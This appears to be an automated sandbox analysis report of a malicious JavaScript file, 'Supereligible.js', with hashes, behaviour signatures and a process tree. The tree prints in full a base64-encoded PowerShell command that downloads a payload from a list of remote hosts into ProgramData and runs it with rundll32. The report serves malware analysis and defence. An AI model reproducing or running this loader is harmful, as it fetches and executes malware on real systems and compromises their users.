Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2023 00:06
Static task
static1
Behavioral task
behavioral1
Sample
Supereligible.js
Resource
win10v2004-20230221-en
Behavioral task
behavioral2
Sample
Supereligible.js
Resource
win10v2004-20230220-en
General
-
Target
Supereligible.js
-
Size
289KB
-
MD5
6aaa0df2794cac724a8cac9a2e7b7000
-
SHA1
0d4e4214e7712b3389e31a5fd6713356882f23d2
-
SHA256
971b3f61a90896f2f8e3a64a32758eb9956f0c113079f7fa1fa68066bc466ee0
-
SHA512
67b7a2b4affc187f038a545013fec01404028e23a451527fea9fc33d97cf70ab71f1928dd290ed6a657af98073db06bd509ec21f5cfd5bee5a34e081d0268eb9
-
SSDEEP
6144:ZcmeptsNC1S3TgQ/8VdZqOowvd8lmDNv5BCs:OQkn
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 36 1868 powershell.exe 38 1868 powershell.exe 53 1868 powershell.exe 55 1868 powershell.exe 58 1868 powershell.exe 63 1868 powershell.exe 68 1868 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1868 powershell.exe 1868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1868 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4448 wrote to memory of 3920 4448 wscript.exe 89 PID 4448 wrote to memory of 3920 4448 wscript.exe 89 PID 3920 wrote to memory of 1868 3920 wscript.exe 90 PID 3920 wrote to memory of 1868 3920 wscript.exe 90
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Supereligible.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\ProgramData\Fidgeter.js" teatimeOrthodox SheepdipQuarrels2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JAB1AG4AYgBsAHUAcwBoAGkAbgBnAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABZAEEAVwBVAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABrAEEATQBBAEEAdQBBAEQAZwBBAE0AZwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAegBBAEQAYwBBAFcAVQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAEEAQQA9ACIAOwAkAE0AaQBzAHQAcgBpAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAEUAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQA9AE0AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAGMAQQBMAGcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBBAD0APQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQATQBBAEwAZwBBAHkAQQBEAFEAQQBOAEEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE4AdwBBAHcAQQBBAD0APQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcAawBBAFkAZwBCAHkAQQBHAGsAQQBiAGcAQgB2AEEASABBAEEAYgBBAEIAaABBAEgATQBBAGQAQQBCAHAAQQBHADQAQQBMAGcAQgB3AEEARwBVAEEAIgA7ACQAYQBwAGgAZQBzAGkAcwBCAGEAYwB0AHIAaQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAGMAQQBNAEEAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAEUAQQBMAHcAQQB6AEEASABRAEEAUQBnAEIAbQBBAEQAawBBAEwAdwBCAE4AQQBGAFkAQQBhAHcAQgBKAEEARwBNAEEAaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAE0AQQBMAGcAQQAwAEEARABVAEEATABnAEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA4AEEATgB3AEIATABBAEcANABBAFoAUQBBAHYAQQBHAFEAQQBTAHcAQQA9AGkAWgBZAHkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBBAEEAdQBBAEQAUQBBAE4AQQBBAHUAQQBEAEkAQQBNAFEAQQB5AEEAQwA0AEEATgB3AEEANABBAEMAOABBAFUAQQBBAHYAQQBIAEEAQQBUAEEAQQB5AEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEMANABBAE4AQQBBADQAQQBDADQAQQBOAHcAQQB4AEEAQwA4AEEAVwBRAEIANABBAEQAUQBBAFQAZwBBAHYAQQBFAHMAQQBlAEEAQgAzAEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARABZAEEATgBBAEIAbgBBAEgAawBBAE4AZwBCAEwAQQBFAHMAQQBiAFEAQgBEAEEAQQA9AD0AaQBaAFkAeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQBzAEEAZAB3AEIAegBBAEcAdwBBAFMAdwBCAE8AQQBFAFEAQQBpAFoAWQB5AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAGsAQQBFADgAQQBUAFEAQQAzAEEARgBFAEEAYwB3AEIAUgBBAEcAcwBBAGEAQQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwBhAGMAYwBhAHIAaQBmAHkAIABpAG4AIAAkAGEAcABoAGUAcwBpAHMAQgBhAGMAdAByAGkAdABlAHMAIAAtAHMAcABsAGkAdAAgACIAaQBaAFkAeQAiACkAIAB7AHQAcgB5ACAAewAkAEIAYQBsAGwAcABhAHIAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAHoAQQBHAHcAQQBiAHcAQgAzAEEARwA0AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGoAQQBIAEkAQQBhAFEAQgBqAEEARwBzAEEAWgBRAEIAMABBAEEAPQA9ACIAOwAkAFMAdABpAHAAcABsAGUAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABTAGEAYwBjAGEAcgBpAGYAeQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFMAdABpAHAAcABsAGUAcgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABQAGgAbwBuAG8AZwByAGEAbQBtAGEAdABpAGMAYQBsAC4AcwBpAHMAdABpAG4AZQBOAGUAdQByAGUAcgBnAGkAYwA7ACQAZQBsAGUAYwB0AHIAbwBkAHkAbgBhAG0AbwBtAGUAdABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBRAEEAPQBhAGEAWQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQAxAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAGMAQQAiADsAJABpAG0AcAByAGUAZwBuAGEAdABvAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAEEAQgBzAEEARwA4AEEAWgB3AEIAbABBAEcANABBAGEAUQBCAGoAQQBDADQAQQBjAHcAQgBsAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUABoAG8AbgBvAGcAcgBhAG0AbQBhAHQAaQBjAGEAbAAuAHMAaQBzAHQAaQBuAGUATgBlAHUAcgBlAHIAZwBpAGMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAyADAANQAwADgANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAEoAQQBCAGwAQQBHADQAQQBkAGcAQQA2AEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBSAEEAQgBoAEEASABRAEEAWQBRAEIAYwBBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEcAMABBAFkAUQBCADAAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEATABnAEIAegBBAEcAawBBAGMAdwBCADAAQQBHAGsAQQBiAGcAQgBsAEEARQA0AEEAWgBRAEIAMQBBAEgASQBBAFoAUQBCAHkAQQBHAGMAQQBhAFEAQgBqAEEAQwB3AEEAWQBnAEIAcABBAEcANABBAFoAQQBBADcAQQBBAD0APQAiADsAJABjAG8AbgB2AGUAeQBhAG4AYwBlAFYAaQBkAHUAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQA1AEEAQwA0AEEATwBBAEEAMwBBAEMANABBAE0AZwBBAHgAQQBEAGMAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQAiADsAJABiAGUAYQB0AGUAcgBzAFUAbgBwAGUAcgBjAGUAaQB2AGUAZABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBADEAQQBEAGcAQQBMAGcAQQAzAEEARABRAEEAYwBMAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATwBRAEEAdQBBAEQASQBBAE0AZwBBAHcAQQBDADQAQQBNAFEAQQB5AEEARABNAEEATABnAEEAeQBBAEQAUQBBAE4AZwBBAD0AYwBMAGoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADAAQQBEAE0AQQBMAGcAQQAwAEEARABRAEEATABnAEEAMgBBAEQAVQBBAGMATABqAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHUAQQBIAFEAQQBZAFEAQgBzAEEARwBrAEEAZQBnAEIAcABBAEcANABBAFoAdwBCAFEAQQBIAE0AQQBaAFEAQgAxAEEARwBRAEEAYgB3AEIAdABBAEgAVQBBAGIAQQBCADAAQQBHAGsAQQBiAEEAQgB2AEEARwBNAEEAZABRAEIAcwBBAEcARQBBAGMAZwBBAHUAQQBHAGcAQQBiAHcAQgBqAEEARwBzAEEAWgBRAEIANQBBAEEAPQA9ACIAOwAkAGkAbgB0AGUAcgBsAGEAYwB1AHMAdAByAGkAbgBlAE0AZQB0AGEAZwBlAG8AbQBlAHQAcgBpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB1AEEARwA4AEEAYgBnAEIAagBBAEcAOABBAGIAZwBCAG0AQQBHAFUAQQBaAEEAQgBsAEEASABJAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBFAFEAQQBhAFEAQgB3AEEARwB3AEEAYgB3AEIAdwBBAEcAZwBBAGUAUQBCADAAQQBHAFUAQQBMAGcAQgAyAEEARwBrAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAD0AaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGMAQQBPAEEAQQB1AEEARABFAEEATQBRAEEAMABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQB5AEEARABNAEEATQBnAEEAPQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAawBBAE8AUQBBAHUAQQBEAGcAQQBNAFEAQQB1AEEARABVAEEATwBBAEEAdQBBAEQAZwBBAE0AdwBBAD0AaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABNAEEATABnAEEAeQBBAEQAQQBBAE4AQQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AfQA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
289KB
MD56aaa0df2794cac724a8cac9a2e7b7000
SHA10d4e4214e7712b3389e31a5fd6713356882f23d2
SHA256971b3f61a90896f2f8e3a64a32758eb9956f0c113079f7fa1fa68066bc466ee0
SHA51267b7a2b4affc187f038a545013fec01404028e23a451527fea9fc33d97cf70ab71f1928dd290ed6a657af98073db06bd509ec21f5cfd5bee5a34e081d0268eb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82